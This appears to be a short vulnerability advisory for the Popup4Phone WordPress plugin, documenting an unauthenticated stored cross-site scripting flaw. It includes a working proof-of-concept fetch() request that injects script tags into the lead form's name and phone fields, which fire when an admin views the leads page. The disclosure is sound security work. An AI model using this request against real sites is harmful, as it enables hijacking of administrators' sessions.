Description The plugin does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.
Run the following JavaScript in the browser console:
```
fetch("/", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40example.com&popup4phone%5Bmessage%5D=test&ajax=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
After running the JavaScript, log in as an admin and browse to "Popup4Phone > Leads" and see the XSS